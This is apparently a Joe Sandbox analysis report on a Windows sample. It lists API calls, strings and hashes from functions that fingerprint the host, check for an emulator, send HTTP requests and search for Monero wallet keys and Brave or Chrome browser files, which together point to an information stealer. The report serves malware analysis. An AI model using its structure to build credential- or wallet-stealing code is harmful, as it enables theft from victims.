                              • Instruction Fuzzy Hash: CBF08270A85209EFE700BBA0DC0ABBE7B74FB86701F248715F513A11C1DBB85580E666
                              Function 007947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 289c86733190259971e0fffddf387a9fb8ec9952091fa7a34b41d05c819d1133
                              • Instruction ID: fbe6b21524205ed2d85362adfb5434cf40ca35e27609c4c5eb73e2bbb8f85b0f
                              • Opcode Fuzzy Hash: 289c86733190259971e0fffddf387a9fb8ec9952091fa7a34b41d05c819d1133
                              • Instruction Fuzzy Hash: CF213EB1E01209ABDF14DFA4E849BDD7B74FB45320F108625F915A7280DB746A05CB92
                              Function 007A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 00796280: InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                                • Part of subcall function 00796280: StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                                • Part of subcall function 00796280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                                • Part of subcall function 00796280: HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                                • Part of subcall function 00796280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                                • Part of subcall function 00796280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: d8a4e3ffeebc35f294a304605b72d55af8fa43cfe72928d833a90f558c42a9ed
                              • Instruction ID: eba29fa43e15e3308f7bcb79fe746e8a25e0bdb25e61d39795250a99c5913ea3
                              • Opcode Fuzzy Hash: d8a4e3ffeebc35f294a304605b72d55af8fa43cfe72928d833a90f558c42a9ed
                              • Instruction Fuzzy Hash: 08112E70910008FBCB54FF64DD5AAED7378AF91340F808268F80A4A592EF3CAB15C792
                              Function 007A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 64a02e3bb2521495bf25b343ec704ce1fee4e3509edca6c67d801c8885237137
                              • Instruction ID: 812cafbce98727c268ab10317b74c9f8596ea8cec77a952f182c4d1dc88666dc
                              • Opcode Fuzzy Hash: 64a02e3bb2521495bf25b343ec704ce1fee4e3509edca6c67d801c8885237137
                              • Instruction Fuzzy Hash: E40186B1948204EFC714DF94DD45BABFBB8F745B11F10421AF945E3280C3785940DBA2
                              Function 00791110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0079112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00791132
                              • ExitProcess.KERNEL32 ref: 00791143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 1b8c5d0ed868dce07c6af3ba6c4847d58ccc3c0048535de4b2afee570b2a1529
                              • Instruction ID: ff593de007ff964305230fa3aba01f41687e00dd7bacad2c91a337bbfa2cc398
                              • Opcode Fuzzy Hash: 1b8c5d0ed868dce07c6af3ba6c4847d58ccc3c0048535de4b2afee570b2a1529
                              • Instruction Fuzzy Hash: CFE0E6709DA34CFFEB106BA5AC0EB097778AB04B01F504055F709761D0D6B52660A699
                              Function 007910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007910B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007910F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 694f4967f038390d84944a1241095f70c869ca2c314984b230e80d031cb5ba5b
                              • Instruction ID: 0cdaa06019021b348705e899d65c3ba40dc0080e07f3b50d14a7241b33ff9438
                              • Opcode Fuzzy Hash: 694f4967f038390d84944a1241095f70c869ca2c314984b230e80d031cb5ba5b
                              • Instruction Fuzzy Hash: D3F02E71681304BBEB149BA8AC49FBFB7DCD705715F300444F504E3280D5725F40DA51
                              Function 00791190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                                • Part of subcall function 007A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                                • Part of subcall function 007A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                                • Part of subcall function 007A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                                • Part of subcall function 007A7850: RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                                • Part of subcall function 007A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                              • ExitProcess.KERNEL32 ref: 007911C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 220fe0ae2cf866759274b089c48db29d90f81ebb57f3373286021f9003a8eafe
                              • Instruction ID: 44c2959e468bc8bbe3dab5fbcd3f059b639fbeec48ac925ce29510b53ebcaa35
                              • Opcode Fuzzy Hash: 220fe0ae2cf866759274b089c48db29d90f81ebb57f3373286021f9003a8eafe
                              • Instruction Fuzzy Hash: 44E012B5EA8306E3CE0473B0FC0EB2A339C9B55345F440625FA05D2112FE2DE860D566

                              Non-executed Functions

                              Function 007A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007A38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A38E3
                              • lstrcat.KERNEL32(?,?), ref: 007A3935
                              • StrCmpCA.SHLWAPI(?,007B0F70), ref: 007A3947
                              • StrCmpCA.SHLWAPI(?,007B0F74), ref: 007A395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A3C67
                              • FindClose.KERNEL32(000000FF), ref: 007A3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: f5ad04a4c018738bfd989d22f0a75a14cc7a15e7b2d5c57ad15eba058f714620
                              • Instruction ID: 033603023e96f58d870ca669a4e72d5c0d4e819ed28a5b1bf8034a8ac63ba9c7
                              • Opcode Fuzzy Hash: f5ad04a4c018738bfd989d22f0a75a14cc7a15e7b2d5c57ad15eba058f714620
                              • Instruction Fuzzy Hash: 41A143B1A50218DBDB24DFA4DC89FFE7378BB85300F444689B60D96141EB789B94CF62
                              Function 0079BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,007B0B32,007B0B2B,00000000,?,?,?,007B13F4,007B0B2A), ref: 0079BEF5
                              • StrCmpCA.SHLWAPI(?,007B13F8), ref: 0079BF4D
                              • StrCmpCA.SHLWAPI(?,007B13FC), ref: 0079BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0079C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: aa0390bbf4d5eb86efb9bb809708ea89a74e01bc4359af4226b2ff8464f16192
                              • Instruction ID: c1d952dcc84ea76412e194ab6147de66e17ae9add7fbd0091bcee58e1f526cd0
                              • Opcode Fuzzy Hash: aa0390bbf4d5eb86efb9bb809708ea89a74e01bc4359af4226b2ff8464f16192
                              • Instruction Fuzzy Hash: 3D424572910104EBCF54FB70DD9AEEE737DAB95300F408668B50696191EF3CAB49CB92
                              Function 007A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007A492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                              • StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                              • StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                              • FindClose.KERNEL32(000000FF), ref: 007A4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 53f3f8ca8185148f6d68500ee014e220fbb53d6f2afe0ef8909ff0fdaba50fc1
                              • Instruction ID: e06ee25fca6c64d6d6177a095ce02548007fb2001271f4b7a4df3b1d21d85bd1
                              • Opcode Fuzzy Hash: 53f3f8ca8185148f6d68500ee014e220fbb53d6f2afe0ef8909ff0fdaba50fc1
                              • Instruction Fuzzy Hash: 406155B1910218ABCB20EBA0DC49FFB737CBB89700F444689B60996141EB75EB95DF91
                              Function 007A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007A4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A4587
                              • wsprintfA.USER32 ref: 007A45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A45BD
                              • StrCmpCA.SHLWAPI(?,007B0FC4), ref: 007A45EB
                              • StrCmpCA.SHLWAPI(?,007B0FC8), ref: 007A4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A468B
                              • FindClose.KERNEL32(000000FF), ref: 007A46A0
                              • lstrcat.KERNEL32(?,014CE9C8), ref: 007A46C5
                              • lstrcat.KERNEL32(?,014CD980), ref: 007A46D8
                              • lstrlen.KERNEL32(?), ref: 007A46E5
                              • lstrlen.KERNEL32(?), ref: 007A46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
